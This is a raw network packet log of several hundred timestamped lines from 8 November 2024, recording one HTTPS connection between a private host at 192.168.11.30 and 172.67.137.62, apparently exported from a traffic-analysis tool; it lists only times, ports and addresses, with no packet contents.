                                                                                                        Nov 8, 2024 11:11:04.972724915 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.972724915 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.973104954 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.974270105 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:04.974282980 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:04.974566936 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.974576950 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:04.974746943 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.974939108 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.975225925 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:04.975481033 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:04.987498999 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.150306940 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.150321007 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.150531054 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.150707006 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.150707006 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.150718927 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.150887012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.152211905 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.152225018 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.152369022 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.152378082 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.152565002 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.152755976 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.153676033 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.153687000 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.153872967 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.154109001 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.154109001 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.154119968 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.154289007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.154674053 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.156009912 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.156392097 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.157138109 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.157329082 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.157521009 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.157711029 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.158768892 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.158768892 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.158778906 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.158961058 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.159343958 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.159537077 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.160159111 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.160159111 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.160347939 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.160350084 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.160537958 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.160772085 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.161446095 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.161446095 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.161637068 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.161828995 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.162015915 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.162019014 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.163584948 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.163767099 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.164381981 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.164387941 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.165529966 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.165529966 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.165540934 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.165716887 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.165726900 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.165909052 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.165909052 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.166114092 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.166124105 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.166510105 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.166510105 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.166520119 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.166692972 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.167062044 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.167069912 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.167457104 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.167459011 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.168586969 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.168586969 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.168802977 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.169192076 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.169193983 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.170150042 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.170157909 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.170341015 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.170804977 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.172051907 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.172245026 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.172247887 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.173418045 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.173418045 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.173608065 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.173790932 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.173793077 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.175223112 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.175415039 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.175601959 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.175796032 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.175797939 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.177045107 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.177045107 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.177054882 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.177212954 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.177236080 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.177236080 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.177246094 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.178148985 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.178158998 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.178292036 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.178302050 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.178474903 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.178667068 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.179286003 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.179294109 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.179689884 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.179698944 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.180073977 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.181622982 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.182194948 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.183345079 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.183535099 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.183726072 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.183732986 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.184339046 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.184525967 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.184717894 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.185951948 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.185951948 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.185951948 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.186141968 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.186573982 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.187331915 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.187522888 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.187531948 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.187535048 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.188895941 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.189088106 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.189280033 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.189609051 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.189613104 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.190468073 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.190850973 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.190850973 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.190862894 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.191039085 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.191047907 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.191174984 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.191226959 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.191236019 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.191601038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.191608906 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.191842079 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.192274094 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.192281961 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.192694902 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.192703962 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.192874908 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.193247080 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.193382025 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.193528891 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.193934917 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.194175005 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.194935083 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.195123911 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.195502043 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.195985079 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.196175098 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.196367025 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.197365999 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.197551966 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.197551966 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.197741985 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.198198080 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.198359013 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.198976994 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.199170113 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.199172974 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.199177027 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.199970007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.199970007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.200158119 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.200573921 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.200577021 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.202159882 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.202159882 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.202581882 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.202584028 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.203643084 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.203830004 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.203830004 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.203838110 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.204691887 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.204691887 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.204699993 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.204883099 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.205070019 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.205075026 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.205492020 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.205900908 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.205909967 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.206243038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.206249952 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.206434965 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.207360029 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.207369089 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.207633972 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.207643986 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.207823038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.208394051 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.208403111 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.208555937 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.208564997 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.208940029 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.210011005 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.210019112 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.210352898 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.210352898 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.210364103 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.210541010 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.211674929 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.211687088 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.211862087 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.211870909 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.212241888 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.212904930 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.212913990 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.213064909 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.213243961 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.213252068 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.213435888 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.213846922 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.214786053 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.214972019 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.214972019 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.215156078 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.216124058 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.216125965 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.216694117 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.217077017 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.217087030 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.217313051 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.217506886 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.217508078 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.218511105 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.218511105 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.218699932 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.218888044 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.261954069 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.270888090 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.295177937 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.394313097 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.394694090 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.394695044 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.395837069 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.395837069 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.395848036 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.395849943 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.396215916 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.397166967 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.397177935 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.397181988 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.397183895 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.397358894 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.398195028 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.398221016 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.398230076 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.398416042 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.398425102 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.398605108 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.398605108 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.398792028 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.399319887 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.399512053 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.400654078 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.400654078 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.400654078 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.400846004 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.401035070 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.401516914 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.401518106 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.402283907 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402283907 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402296066 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.402473927 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402473927 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402473927 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402473927 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.402486086 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.403215885 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.403215885 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.403779984 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.404200077 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.404575109 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.405334949 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.405524015 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.405524015 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.405714035 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.405714035 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.406090021 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.406570911 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.406768084 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.406774044 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.407331944 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.407902002 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.407902002 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.407912970 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.408092022 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.408524990 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.408715963 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.409126043 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.409133911 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.409372091 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.409372091 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.409554005 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.410038948 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.410864115 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.411046028 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.411236048 CET44349779172.67.137.62192.168.11.30
